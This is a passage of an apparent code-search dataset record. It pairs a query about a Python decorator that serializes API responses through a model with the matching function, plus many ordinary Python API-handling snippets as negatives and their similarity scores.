self.debug.ok(constants.ResponseConst.RESPONSE_OBJECT, response)\n\n return response.status_code, response.text\n\n else:\n return constants.ResponseCode.NOT_FOUND, {}\n\n def _process_response(self, status_code, response):\n \"\"\"\n Process response using models\n :status_code: Response status code\n :response: Content\n :return: Response object\n \"\"\"\n\n formatter = self.formatter\n if not formatter:\n formatter = FormatterFactory(constants.FormatterConst.JSON)\\\n .get_formatter()\n\n response = Response(response, status_code, formatter, self)\n formatted_data = response.formatted_data\n\n if status_code >= constants.ResponseCode.BAD_REQUEST:\n\n if status_code == constants.ResponseCode.NOT_FOUND:\n error_msg = \\\n constants.ErrorConst.NOT_FOUND\n elif constants.ErrorConst.ERROR not in formatted_data:\n error_msg = \\\n constants.ResponseConst.DEFAULT_ERROR_MESSAGE\n else:\n error_msg = formatted_data.get(\n constants.ErrorConst.ERROR, {}\n ).get(\n constants.ErrorConst.DETAIL,\n constants.ErrorConst.UNRECOGNIZED_ERROR\n )\n\n self.debug.error(\n constants.ResponseConst.STATUS_CODE, status_code\n )\n self.debug.error(\n constants.ResponseConst.RESPONSE, response.formatted_data\n )\n raise SendbeeRequestApiException(error_msg)\n else:\n self.debug.ok(constants.ResponseConst.STATUS_CODE, status_code)\n self.debug.ok(constants.ResponseConst.RESPONSE, response.raw_data)\n\n if response.meta.current_page:\n if response.meta.current_page > 1 and len(response.models) == 0:\n raise PaginationException(\n f'Page {response.meta.current_page} has no data'\n )\n\n if response.warning:\n click.secho(\n 
constants.WarningConst.MESSAGE + response.warning,\n fg='yellow'\n )\n\n if self.single_model_response:\n if response.models:\n return response.models[0]\n else:\n return None\n else:\n return response\n\n def call(self):\n \"\"\"\n Makes the API call\n :return: Return value from self._process_response()\n \"\"\"\n\n self.url = self._prepare_url()\n status_code, response = self._do_request(self.url)\n return self._process_response(status_code, response)\n\n def call(client, *path_params, **query_params):\n \"\"\"\n Binded method for API calls\n :path_params: list of path parameters\n :query_params: dict of query parameters\n :return: Return value from Request.call()\n \"\"\"\n\n if constants.MiscConst.PRINT_PARAMS in query_params:\n Request.query_parameters.print_params()\n return\n\n with Debug(client=client) as debug:\n request = Request(client, debug, *path_params, **query_params)\n return request.call()\n\n call.__doc__ = request_data.get(constants.ClientConst.DESCRIPTION)\n\n return call", "def _set_attributes(self, model):\n\n if model:\n self._get_dict(model)", "def train_model(self, *args, **kwargs):\n raise NotImplementedError", "def requests_response_to_model(response_transformer):\n def response_transform_decorator(original_func):\n \"\"\"\n Creates wrapper around a function that returns response\n \"\"\"\n def response_transformer_wrapper(*args, **kwargs):\n \"\"\"\n Log errors and apply transformation in response_handler_func\n \"\"\"\n try:\n response = original_func(*args, **kwargs)\n response.raise_for_status()\n\n except requests.exceptions.HTTPError:\n help_string = ('Please consult the Coursera Data '\n 'Exports Guide for further assistance: '\n 'https://partner.coursera.help/hc/en-us/articles/360021121132.') # noqa\n\n if (response.status_code == 403):\n help_string = ('Please authorize this application '\n 'by running:\\n'\n '\\t$ courseraoauth2client config authorize --app manage_research_exports\\n' # noqa\n 'See https://github.com/coursera/courseraoauth2client ' # noqa\n 'for more information on authorization.\\n'\n 'For further assistance, consult the '\n 'Coursera Data Exports Guide '\n 'https://partner.coursera.help/hc/en-us/articles/360021121132.') # noqa\n\n logging.error(\n 'Request to {url} with body:\\n\\t{body}\\nreceived response'\n ':\\n\\t{text}\\n'\n '{help_string}\\n'\n .format(url=response.url,\n text=response.text,\n body=(response.request and response.request.body),\n help_string=help_string))\n raise\n\n return response_transformer(response)\n return response_transformer_wrapper\n return response_transform_decorator", "def handle_model_request(model_name):\n if model_name in app.models:\n return (\n json.dumps(app.models[model_name][\"data\"]), 200,\n {'ContentType': 'application/json'}\n )\n else:\n return _respond_not_found()", "def deserialize_model(data, klass):\n instance = klass()\n\n if not instance.swagger_types:\n return data\n\n for attr, attr_type in iteritems(instance.swagger_types):\n if data is not None \\\n and instance.attribute_map[attr] in data \\\n and isinstance(data, (list, dict)):\n value = data[instance.attribute_map[attr]]\n setattr(instance, attr, _deserialize(value, attr_type))\n\n return instance", "def prepare_request_params(\n request_params: Dict, model_id: Text, model_data: Dict\n) -> Dict:\n request_params = correct_types(request_params, model_data[\"columns_data\"])\n if model_data[\"hashed_indexes\"]:\n request_params = reverse_hash_names(model_id, request_params)\n return request_params", "def to_payload(self, 
model):\n if self.skip:\n raise SkipField\n payload = dict(map_zip_model_fields(model, self.attrgetter))\n if model.remote_instance:\n zipped_remote_instance = map_zip_model_fields(\n model.remote_instance, self.remote_instance_attrgetter\n )\n payload.update(zipped_remote_instance)\n\n for field, mapping in model.fields.items():\n self.serialize_field(payload, model, field, mapping)\n payload['local_id'] = model.id\n return payload", "def instance_for_model(self, model: AbstractPriorModel):\n try:\n if self.is_path_kwargs:\n return model.instance_from_path_arguments(self.kwargs)\n else:\n return model.instance_from_prior_name_arguments(self.kwargs)\n\n except KeyError:\n # TODO: Does this get used? If so, why?\n return model.instance_from_vector(self.parameter_lists_for_model(model))", "def lock_model():\n def decorate(cls):\n def decorator(fn):\n @wraps(fn)\n def inner(*args, **kwargs):\n # This is a class decorator and its targets are methods, so\n # the first argument will be ``self``.\n self = args[0]\n model = self.request.validated.get('model', None)\n method_name = '%s.%s' % (self.__class__.__name__, fn.__name__)\n\n # Lock the model before entering the method body.\n if model:\n model.lock.acquire()\n log.info('Model locked by %s' % method_name)\n\n try:\n result = fn(*args, **kwargs)\n except:\n # Release the lock if an exception occurs and propagate\n # the exception up the stack.\n if model:\n model.lock.release()\n log.exception('Model unlocked after view exception '\n 'by %s' % method_name)\n raise\n\n # Release the lock after the method completes.\n if model:\n model.lock.release()\n log.info('Model unlocked by %s' % method_name)\n\n return result\n return inner\n\n targets = ['get', 'put', 'post', 'delete']\n for method in [attr for attr in cls.__dict__\n if attr in targets and callable(getattr(cls, attr))]:\n setattr(cls, method, decorator(getattr(cls, method)))\n\n return cls\n return decorate" ]
[ "0.6261429", "0.61969465", "0.5975331", "0.56145257", "0.5604642", "0.55971265", "0.558913", "0.5562619", "0.54409605", "0.5427529", "0.5384895", "0.53138745", "0.531021", "0.5299018", "0.52693087", "0.52421254", "0.5187899", "0.5182848", "0.51826674", "0.5159831", "0.5159831", "0.5132555", "0.51257706", "0.51168", "0.5110996", "0.5110925", "0.5107068", "0.5103126", "0.5091716", "0.5048244", "0.5033175", "0.50312096", "0.50292754", "0.50264955", "0.5012763", "0.5008977", "0.49970418", "0.4992126", "0.49610615", "0.49523407", "0.49501094", "0.49346828", "0.4904013", "0.48733094", "0.48708904", "0.48708394", "0.4857201", "0.48379785", "0.48371997", "0.48354936", "0.48328754", "0.48277834", "0.4820644", "0.48162234", "0.48080027", "0.4805414", "0.47922263", "0.47865775", "0.47852632", "0.47851872", "0.47815546", "0.47809896", "0.4777303", "0.47752586", "0.4768624", "0.47580582", "0.4757899", "0.4757329", "0.47496775", "0.47445446", "0.47354397", "0.47329253", "0.47254753", "0.47252694", "0.47247794", "0.47241142", "0.4722958", "0.4722006", "0.4721456", "0.47187555", "0.47036093", "0.47021738", "0.4691032", "0.4689762", "0.46874171", "0.46859795", "0.46859795", "0.46859795", "0.46859795", "0.4683353", "0.46761313", "0.467539", "0.466834", "0.46577623", "0.4648633", "0.4647231", "0.46471933", "0.46432763", "0.46369275", "0.46306255" ]
0.7151013
0
Decorator to be used in apimethods to convert the responsedata of the decorated apimethod to a json based on the passed `model`.
def api_outputmodel(api: str, model: BaseModel, servicename: str, service_logger: logger) -> Callable: def decorator(func): @wraps(func) async def function_wrapper(request, *args, **kwargs): service_result = await func(request, *args, **kwargs) try: if isinstance(service_result, model): result = service_result else: result = model(**service_result) output = response.json(result.dict()) except Exception as err: msg = ('an internal error occured (service: ' f'{servicename}, api: {api}): {err}') raise ServerError(msg) service_logger.info(f'processed result {result} => ' f'{output.content_type} [{output.status}] ' f'{output.body}') return output return function_wrapper return decorator
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def json_response(func):\n\t@wraps(func)\n\tdef decorated_view(*args, **kwargs):\n\t\tdata = func(*args, **kwargs)\n\t\tdata = json.dumps(data)\n\t\tresponse = make_response(data)\n\t\tresponse.headers['Content-Type'] = 'application/json'\n\t\treturn response\n\treturn decorated_view", "def json_response(func):\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n if isinstance(objects, HttpResponse):\n return objects\n try:\n data = simplejson.dumps(objects)\n if 'callback' in request.GET:\n data = '%s(%s);' % (request.GET['callback'], data)\n except:\n data = simplejson.dumps(str(objects))\n if 'just_the_json_plz' in kwargs:\n return data\n if 'just_the_data_plz' in kwargs:\n return objects\n if 'callback' in request.GET or 'callback' in request.POST:\n #jsonp\n return HttpResponse(data, \"text/javascript\")\n else:\n #json\n return HttpResponse(data, \"application/json\")\n return decorator", "def as_json(func):\n @functools.wraps(func)\n def inner(*args, **kwargs):\n json_response = _as_json(func(*args, **kwargs))\n if isinstance(json_response, tuple):\n response, code = json_response\n if isinstance(response, GenericYetiError):\n return jsonify({response.type: response.message}), code\n return jsonify(response), code\n return jsonify(json_response)\n return inner", "def from_model(model):\n ret = model2json(model)\n return JsonBody(ret['body'])", "def json_response(func):\n def wrapper(*args, **kwargs):\n try:\n ret_val = func(*args, **kwargs)\n if isinstance(ret_val, dict):\n result = {\"code\": 0, \"msg\": \"\", \"data\": ret_val}\n return JsonResponse(result)\n else:\n result = {\"code\": -20002, \"msg\": u\"视图函数返回值类型必须是字典\"}\n return JsonResponse(result)\n\n except Exception as err:\n logger.exception(\"func name: %s, error: %s\" % (func.__name__, err))\n result = {\"code\": -20001, \"msg\": str(err)}\n return JsonResponse(result)\n return wrapper", "def handle_model_request(model_name):\n if model_name in app.models:\n return (\n json.dumps(app.models[model_name][\"data\"]), 200,\n {'ContentType': 'application/json'}\n )\n else:\n return _respond_not_found()", "def response_json(func):\n\n @wraps(func)\n def set_response(*args, **kwargs):\n res = func(*args, **kwargs)\n if type(res) is not dict:\n return res\n else:\n return Response(json.dumps(res), content_type=\"application/json; charset=utf-8\")\n return set_response", "def jsonify(function):\n @wraps(function)\n def inner(*args, **kwargs):\n \"\"\"\n This docstring will be overridden by @wraps decorator.\n \"\"\"\n return Response(\n dumps(function(*args, **kwargs)),\n mimetype='application/json'\n )\n return inner", "def jsonify(func):\n\n @functools.wraps(func)\n def convert(*args, **kwargs):\n\n success = True\n code = 200 # default status code - success!\n\n try:\n result = func(*args, **kwargs)\n\n if isinstance(result, BaseResponse):\n return result\n\n except exc.HTTPException as ex:\n # i'd like to be able to just re-raise e here, but the body of the\n # response is e.get_body() instead of e.description - so we have to\n # just set up the response ourselves\n result = { 'message' : ex.description }\n code = ex.code\n\n except Exception as ex:\n result = { 'message' : 'Internal Server Error', 'system_message' : ex.message }\n code = 500\n\n # build a response object, and change the content type header to json\n response = make_response(json.dumps(result))\n response.headers['Content-Type'] = 'application/json'\n response.status_code = code\n\n return response\n\n # return the 
function that is taking the place of (or masquerading as) our decorated function\n return convert", "def create_json_from_model(self):\n json = {\n \"enableAutoReply\": self.enable_auto_reply,\n \"responseSubject\": self.response_subject,\n \"responseBodyPlainText\": self.response_body_plain_text,\n \"responseBodyHtml\": self.response_body_html,\n \"restrictToContacts\": self.restrict_to_contacts,\n \"restrictToDomain\": self.restrict_to_domain,\n \"startTime\": self.start_time,\n \"endTime\": self.end_time\n }\n return json", "def json_response(func):\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n if isinstance(objects, HttpResponse):\n return objects\n try:\n data = json.dumps(objects, default=json_serialize)\n if 'callback' in request.REQUEST:\n # a jsonp response!\n data = '%s(%s);' % (request.REQUEST['callback'], data)\n return HttpResponse(data, \"text/javascript\")\n except Exception as e:\n print (e)\n data = json.dumps(str(objects))\n return HttpResponse(data, \"application/json\")\n return decorator", "def json_friendly(self):", "def json_response(func):\n\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n if isinstance(objects, HttpResponse):\n return objects\n try:\n data = simplejson.dumps(objects)\n if 'callback' in request.REQUEST:\n # a jsonp response!\n data = '%s(%s);' % (request.REQUEST['callback'], data)\n return HttpResponse(data, \"text/javascript\")\n except:\n data = simplejson.dumps(str(objects))\n return HttpResponse(data, \"application/json\")\n\n return decorator", "def json_response(func):\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n if isinstance(objects, HttpResponse):\n return objects\n try:\n data = simplejson.dumps(objects)\n if 'callback' in request.REQUEST:\n # a jsonp response!\n data = '%s(%s);' % (request.REQUEST['callback'], data)\n return HttpResponse(data, \"text/javascript\")\n except:\n data = simplejson.dumps(str(objects))\n return HttpResponse(data, \"application/json\")\n return decorator", "def json_decorator(f):\n def decorator(*args, **kwargs):\n return jsonify(f(*args, **kwargs))\n return decorator", "def jsonify(obj):\n raise NotImplementedError", "def json_response(func):\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n if isinstance(objects, HttpResponse):\n return objects\n\n data = json.dumps(objects)\n if 'callback' in request:\n # a jsonp response!\n data = '%s(%s);' % (request['callback'], data)\n return HttpResponse(data, \"text/javascript\")\n\n return HttpResponse(data, \"application/json\")\n return decorator", "def jsonify(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n result = f(*args, **kwargs)\n data = json.dumps(result, indent=None if request.is_xhr else 2)\n return app.response_class(data, mimetype='application/json')\n return decorated_function", "def jsonify(func, *args, **kwargs): \n adict = func(*args, **kwargs)\n if not isinstance(adict, dict):\n return adict\n \n \n #: getting updates from session and database\n \n updates = list(session['callback_updates']) \n updates.extend(models.CallbackUpdate.dump())\n \n if updates:\n if not adict.get('type') == 'composite':\n adict = beans._wrap('composite', [adict]) \n \n adict['result'].extend(updates)\n \n json = simplejson.dumps(adict)\n response = make_response(json) \n response.headers['Content-Type'] = 'application/json'\n session['callback_updates'] = []\n db.session.commit() \n return response", 
"def response_json(func):\n def wrapper(request):\n try:\n return get_json_response(func(request))\n except Exception as ex:\n return get_json_response({\n \"status\": \"error\",\n \"error_info\": str(ex),\n \"trace_back\": traceback.format_exc()\n })\n\n return wrapper", "def json(data, *args, **kwargs):\n return HttpResponseBehaviour(JsonResponse, data, *args, **kwargs)", "def json_service(f):\n\n @wraps(f)\n def decorated_function(*args, **kwargs):\n try:\n results = f(*args, **kwargs)\n if results is None:\n results = {}\n if not isinstance(results, dict):\n results = {'data': results}\n if 'success' not in results:\n results['success'] = True\n return jsonify(results)\n except Exception as e:\n print \"error in: \", f.__name__\n print traceback.print_exc()\n return jsonify({'success': False, 'error': str(e)})\n\n return decorated_function", "def get_json_response(obj):\n return HttpResponse(json.dumps(obj))", "def get_json_response(obj):\n return HttpResponse(json.dumps(obj))", "def model_to_json(model: Base) -> Dict[str, Any]:\n json = {}\n for col in model.__mapper__.attrs.keys(): # type: ignore\n if col != \"hashed_password\" and col != \"salt\":\n if col in datetime_cols:\n # Cast datetime object to string\n json[col] = str(getattr(model, col))\n else:\n json[col] = getattr(model, col)\n return json", "def model_json(request, method, object_id):\n model_object = ImageSelector.objects.filter(id=object_id)\n methods = ['get_prev_front_sibling', 'get_next_front_sibling', 'get_next_cutted_siblings',\n 'get_prev_cutted_siblings', 'get_next_cutted_front_siblings',\n 'get_prev_cutted_front_siblings']\n if len(model_object) == 0 or method not in methods:\n response_dic = {'object': 'not found!'}\n else:\n model_object = model_object[0]\n if method == 'get_prev_front_sibling':\n response_data = [model_object.get_prev_front_sibling()]\n elif method == 'get_next_front_sibling':\n response_data = [model_object.get_next_front_sibling()]\n elif method == 'get_next_cutted_siblings':\n response_data = model_object.get_next_cutted_siblings()\n elif method == 'get_prev_cutted_siblings':\n response_data = model_object.get_prev_cutted_siblings()\n elif method == 'get_next_cutted_front_siblings':\n response_data = model_object.get_next_cutted_front_siblings()\n elif method == 'get_prev_cutted_front_siblings':\n response_data = model_object.get_prev_cutted_front_siblings()\n\n response_dic = []\n if response_data:\n for response in response_data:\n if response.main_image:\n image_id = response.main_image.id\n response_dic.append({'page_id': response.id, 'image_id': image_id})\n\n response_data = json.dumps(response_dic)\n # return an HttpResponse with the JSON and the correct MIME type\n return HttpResponse(response_data, content_type='application/json')", "def __json_call(self, method, data):\n headers = self.headers\n headers['Content-type'] = 'application/json'\n data = json.dumps(data)\n return self.__call(headers, method, data)", "def handle_models_request():\n # TODO: add sort and filter by creation/modification date\n return (\n json.dumps({\"models\": {\n k: d[\"data\"] for k, d in app.models.items()\n }}), 200,\n {'ContentType': 'application/json'}\n )", "def wrap_response(f):\n @wraps(f)\n def wrapped_f(*args, **kwargs):\n resp = f(*args, **kwargs)\n if isinstance(resp, Response):\n return resp\n elif isinstance(resp, list):\n return jsonify({'data': resp})\n elif hasattr(resp,'to_json'):\n return jsonify(resp.to_json())\n else:\n return jsonify(resp)\n return wrapped_f", "def 
json_response(obj):\n return HttpResponse(json.dumps(obj), content_type=\"application/json\")", "def response_json(func):\n\n def wrapper(req):\n try:\n\n return get_json_response(func(req))\n except Exception as ex:\n return get_json_response({\n \"status\": \"error\",\n \"error_info\": str(ex),\n \"trace_back\": traceback.format_exc()\n })\n\n return wrapper", "def api_inputmodel(api: str, model: BaseModel, servicename: str,\n service_logger: logger) -> Callable:\n\n def decorator(func):\n @wraps(func)\n async def function_wrapper(request, *args, **kwargs):\n try:\n service_params = model.parse_raw(request.body)\n except ValidationError as err:\n msg = (f'API: {api} - invalid params ({request.json}) passed '\n f'to {servicename}: {err}')\n service_logger.warning(msg)\n raise PreconditionFailed(msg, status_code=412)\n result = await func(request=request,\n service_params=service_params,\n service_logger=service_logger,\n *args,\n **kwargs)\n return result\n\n return function_wrapper\n\n return decorator", "def _json_default_encoder(func):\n\n @wraps(func)\n def inner(self, o):\n try:\n return o._redpipe_struct_as_dict # noqa\n except AttributeError:\n pass\n return func(self, o)\n\n return inner", "def response(schema):\n def _response(function):\n @wraps(function)\n def wrapper(*args, **kwargs):\n if issubclass(schema, BaseModel):\n has_root = True if '__root__' in schema.__fields__ else False\n function_res = function(*args, **kwargs)\n\n if not function_res:\n if has_root is True:\n return jsonify([])\n return jsonify({})\n\n if type(function_res) == list:\n res = schema.parse_obj(function_res)\n else:\n res = schema.from_orm(function_res)\n\n res = res.dict()\n\n if has_root is True:\n return jsonify(res['__root__'])\n\n return jsonify(res)\n elif isinstance(schema, dict):\n return jsonify(schema)\n else:\n raise CustomException('invalid response type', code=400)\n\n return wrapper\n return _response", "def _create_response_model(self, data):\n pass", "def as_json(self):", "def json(f):\n if dsettings.DEBUG:\n ct = 'text/plain'\n j = lambda d: simplejson.dumps(d, indent = 2)\n else:\n ct = 'application/json'\n j = simplejson.dumps\n def wrapper(func, *args, **kw):\n try:\n result = func(*args, **kw)\n except Exception, e:\n result = j(str(e))\n status = 500\n else:\n if isinstance(result, http.HttpResponse):\n return result\n else:\n result = j(result)\n status = 200\n return http.HttpResponse(content = result, content_type = ct, status = status)\n return decorator(wrapper, f)", "def J(*args, **kwargs):\n response = jsonify(*args, **kwargs)\n response.mimetype = 'application/vnd.api+json'\n return response", "def dispatch(self, request, *args, **kwargs):\n # Wrap the dispatch method, so that we autoencode JSON\n response = super(JSONRestView, self).dispatch(request, *args, **kwargs)\n # If this is not an HTTPResponseBase object (Base class for responses) \n if not isinstance(response, HttpResponseBase):\n response = json_response(response)\n\n return response", "def decorator(func):\n def wrapper(resource, request, ** kwargs):\n \"\"\" wraps the method with common api response's routines, like\n checking if it's authenticated or packing the response in an api\n friendly way\n\n \"\"\"\n # ckech if everything is ok, before proceding\n resource.method_check(request, allowed=expected_methods)\n resource.is_authenticated(request)\n resource.throttle_check(request)\n\n # call the decorated method\n result = func(resource, request, **kwargs)\n\n # if a single response is expected\n if 
single:\n if returns_extra_data:\n objt = result[0]\n else:\n objt = result\n bundle = resource.build_bundle(obj=objt, request=request)\n to_be_serialized = resource.full_dehydrate(bundle)\n if returns_extra_data:\n to_be_serialized.data.update(result[1])\n else: # if we are expecting an array of objects\n # we need to paginante\n paginator = resource._meta.paginator_class(\n request.GET,\n result,\n resource_uri=resource.get_resource_uri(),\n limit=resource._meta.limit,\n max_limit=resource._meta.max_limit,\n collection_name=resource._meta.collection_name)\n\n to_be_serialized = paginator.page()\n\n bundles = [resource.build_bundle(obj=obj, request=request)\n for obj in to_be_serialized['objects']]\n\n to_be_serialized['objects'] = [resource.full_dehydrate(bnd)\n for bnd in bundles]\n\n resource.log_throttled_access(request)\n return resource.create_response(request, to_be_serialized)\n return wrapper", "def to_payload(self, model):\n return model", "def paginated_search_json_response(func):\n @json_response\n @paginated_search_for_json_response\n @paginator\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n return objects\n return decorator", "def opt_model_create_rest_api():\n request_json = request.get_json()\n OptimModelRequestAPI(request_json).validate()\n return create_model_data(request_json)", "def json_response(*args, **kwargs):\n data = stringify(*args, **kwargs)\n return Response(data, mimetype='application/json')", "def paginated_json_response(func):\n @json_response\n @paginated_for_json_response\n @paginator\n def decorator(request, *args, **kwargs):\n objects = func(request, *args, **kwargs)\n return objects\n return decorator", "def render_json(object):\r\n return HttpResponse(jsonify(object), content_type='application/json')", "def default(self, value: typing.Any) -> typing.Any:\n if isinstance(value, ToJson):\n return value.to_response_data()", "def inner(*args, **kwargs):\n return Response(\n dumps(function(*args, **kwargs)),\n mimetype='application/json'\n )", "def model_json(name):\n model = Model.query.filter_by(name=name).first_or_404()\n return jsonify(**model.meta)", "def paginated_search_for_json_response(func):\n def decorator(request, *args, **kwargs):\n page = func(request, *args, **kwargs)\n data = {}\n data['total_number'] = page.paginator.count\n data['page_number'] = page.number\n data['total_pages'] = page.paginator.num_pages\n data['next'] = page.has_next()\n data['previous'] = page.has_previous()\n try:\n data['objects'] = [(a.object.to_json_dict(request)) for a in page.object_list]\n except Exception, args:\n\n try:\n data['objects'] = [(a.object.to_json_dict()) for a in page.object_list]\n except Exception, args:\n data['objects'] = serializers.serialize(\"python\", [a.object for a in page.object_list])\n return data\n return decorator", "def jsonify(obj):\n d = model_to_dict(obj)\n return json.dumps(d, cls=LazyEncoder)", "def json_response(data):\n return current_app.response_class(\n json.dumps(data),\n mimetype=\"application/json\"\n )", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(self.get_data(context))", "def decorated_function(request, *args, **kwargs):\n user_for_login(request)\n response['data'] = f(*args, **kwargs)\n response = json.dumps(response)\n return response", "def paginated_for_json_response(func):\n def decorator(request, *args, **kwargs):\n page = func(request, *args, **kwargs)\n data = {}\n data['total_number'] = page.paginator.count\n 
data['page_number'] = page.number\n data['total_pages'] = page.paginator.num_pages\n data['next'] = page.has_next()\n data['previous'] = page.has_previous()\n objects = []\n for o in page.object_list:\n if hasattr(o, 'to_json_dict'):\n try:\n objects.append(o.to_json_dict())\n except Exception, args:\n pass\n else:\n try:\n objects.append(o)\n except Exception, args:\n pass\n if not objects:\n objects = serializers.serialize(\"python\", [o for o in page.object_list])\n data['objects'] = objects\n return data\n return decorator", "def wrapper(*args, **kwargs):\n response = {\n \"meta\": {\n \"status\": kwargs.pop(\"status\", True),\n \"verbose\": kwargs.pop(\"verbose\", \"OK\")\n },\n \"content\": None\n }\n if not response[\"meta\"][\"status\"]:\n cherrypy.response.headers['Content-Type'] = 'application/json'\n cherrypy.response.status = 400\n return json.dumps(response)\n return method(*args, **kwargs)", "def get_data(self):\n return self.data.to_json()", "def returns_json(f):\n @wraps(f)\n def decorated_function(*args, **kwargs):\n try:\n r = f(*args, **kwargs)\n except HTTPException as e:\n # monkey-patch the headers / body to be json\n headers = e.get_headers()\n for header in headers:\n if 'Content-Type' in header:\n headers.remove(header)\n headers.append(('Content-Type', 'application/json'))\n e.get_headers = lambda x: headers\n e.get_body = lambda x: json.dumps({\"message\": e.description})\n raise e\n if isinstance(r, tuple):\n return Response(r[0], status=r[1], content_type='application/json')\n else:\n return Response(r, content_type='application/json')\n return decorated_function", "def format_service_api_response(func):\n @wraps(func)\n def get_response(*args, **kwargs):\n try:\n res = func(*args, **kwargs)\n return {\"status\": \"200\", \"result\": res}\n except:\n return {\"status\": \"404\", \"result\": \"\"}\n return get_response", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(self.get_data(**context), **response_kwargs)", "def jresp() -> Dict:\n def _method(response):\n return json_of_response(response)\n return _method", "def get_json_string(self, **kwargs):\n ...", "def to_api_data(self):\n raise NotImplementedError()", "def json(self, **kwargs):\n\t\ttry:\n\t\t\treturn self.response.json(**kwargs)\n\t\texcept ValueError:\n\t\t\t# No valid JSON encoding\n\t\t\treturn None", "def acceptjson(vcf_object):\n\n def in_acceptjson(func):\n @wraps(func)\n def return_json(*args, **kwargs):\n g.payload_json = retrieve_json(\n request.base_url,\n int(request.args.get('page', 1)),\n int(request.args.get('limit', 20)),\n vcf_object\n )\n\n if request.headers.get('Accept', '*/*') in ['*/*', 'application/json']:\n return Response(response=json.dumps(g.payload_json), status=200, mimetype=\"application/json\")\n\n return func()\n\n return return_json\n\n return in_acceptjson", "def json_response(f):\n \n def wrapped(*args, **kwargs):\n result = f(*args, **kwargs)\n \n response = HttpResponse(json.dumps(result))\n \n if type(result) == dict and \"error\" in result:\n response.status_code = 500\n \n \n return response", "def __call__(self, value, system): \n request = system.get('request') \n if request is not None: \n if not hasattr(request, 'response_content_type'): \n request.response_content_type = 'application/json'\n request.response.headerlist.append(('Access-Control-Allow-Origin', '*'))\n return customjson.dumps(value)", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(\n self.get_data(context),\n 
**response_kwargs\n )", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(\n self.get_data(context),\n **response_kwargs\n )", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(\n self.get_data(context),\n **response_kwargs\n )", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(\n self.get_data(context),\n **response_kwargs\n )", "def render_to_json_response(self, context, **response_kwargs):\n return JsonResponse(\n self.get_data(context),\n **response_kwargs\n )", "def json_response(func):\n async def wrapped(*args, **kwargs):\n content, status = await func(*args, **kwargs)\n return web.json_response(data=content, status=status)\n return wrapped", "def wrapper(resource, request, ** kwargs):\n # ckech if everything is ok, before proceding\n resource.method_check(request, allowed=expected_methods)\n resource.is_authenticated(request)\n resource.throttle_check(request)\n\n # call the decorated method\n result = func(resource, request, **kwargs)\n\n # if a single response is expected\n if single:\n if returns_extra_data:\n objt = result[0]\n else:\n objt = result\n bundle = resource.build_bundle(obj=objt, request=request)\n to_be_serialized = resource.full_dehydrate(bundle)\n if returns_extra_data:\n to_be_serialized.data.update(result[1])\n else: # if we are expecting an array of objects\n # we need to paginante\n paginator = resource._meta.paginator_class(\n request.GET,\n result,\n resource_uri=resource.get_resource_uri(),\n limit=resource._meta.limit,\n max_limit=resource._meta.max_limit,\n collection_name=resource._meta.collection_name)\n\n to_be_serialized = paginator.page()\n\n bundles = [resource.build_bundle(obj=obj, request=request)\n for obj in to_be_serialized['objects']]\n\n to_be_serialized['objects'] = [resource.full_dehydrate(bnd)\n for bnd in bundles]\n\n resource.log_throttled_access(request)\n return resource.create_response(request, to_be_serialized)", "def json_api():\n if 'category' in request.args:\n sqlsession = SQLSESSION()\n category = sqlsession.query(Category)\\\n .filter_by(name=request.args['category']).first()\n items = sqlsession.query(Item).filter_by(category_id=category.id)\\\n .all()\n return json.dumps({'category_id': category.id,\n 'category_name': category.name,\n 'items': [item.serialize() for item in items]})\n elif 'item' in request.args:\n sqlsession = SQLSESSION()\n items = sqlsession.query(Item).filter_by(name=request.args['item'])\\\n .all()\n return json.dumps([item.serialize() for item in items])\n sqlsession = SQLSESSION()\n categories = sqlsession.query(Category).all()\n items = sqlsession.query(Item).all()\n return json.dumps(\n {'categories': [cat.serialize() for cat in categories],\n 'items': [item.serialize() for item in items]})", "def test_data_to_json(self):\n\n from rubber.instanceutils import data_to_json\n\n # with a dict\n data = {'foo':'bar'}\n json_data = json.dumps(data)\n self.assertEquals(json_data, data_to_json(data))\n\n # with a string\n json_data = json.dumps(data)\n self.assertEquals(json_data, data_to_json(json_data))\n\n # try a class that implements to_indexed_json\n class Foo(object):\n def to_indexed_json(self):\n return json_data\n self.assertEquals(json_data, data_to_json(Foo()))\n\n # try a django model\n try:\n from django.db import models\n class TestModel(models.Model):\n foo = models.CharField(max_length=3)\n bar = TestModel(foo='bar')\n self.assertEquals(json_data, data_to_json(bar))\n except 
ImportError:\n pass", "def safe_json(self, context):\n serialize_context = dict()\n for key, obj in context.items():\n if isinstance(obj.__class__, ModelBase):\n if hasattr(obj, 'serialize') and callable(getattr(obj, 'serialize')):\n serialize_context[key] = obj.serialize()\n else:\n serialize_context[key] = model_to_dict(obj)\n elif isinstance(obj, QuerySet):\n serialize_context[key] = [o.serialize() for o in obj if hasattr(o, 'serialize')]\n if len(serialize_context[key]) != len(obj):\n serialize_context[key] = [model_to_dict(o) for o in obj]\n elif key == 'extra':\n serialize_context[key] = obj\n # elif key == 'view':\n # continue\n # else:\n # serialize_context[key] = obj\n return dict(success=True, data=serialize_context)", "def output_json(data, code, headers=None):\n #data[\"timestamp\"] = datetime.now()\n return jsonify(data)", "def json_response(func):\n\n async def wrapped(*args, **kwargs):\n content, status = await func(*args, **kwargs)\n return web.json_response(data=content, status=status)\n\n return wrapped", "def json_response( json_object ):\n return HttpResponse( json.dumps(json_object) )", "def json_post(method):\n def wrap(*args, **kwargs):\n # idx is the position of the data\n idx = 0\n if not isinstance(args[0], webob.Request):\n idx = 1\n\n json_data = json.loads(args[idx].body)\n kwargs['post_data'] = json_data\n\n #print \"JP:\", repr(args), repr(kwargs)\n\n return method(*args, **kwargs)\n \n return json_return(wrap)", "def api_documentation(api: str, summary: str, in_model: BaseModel,\n out_model: 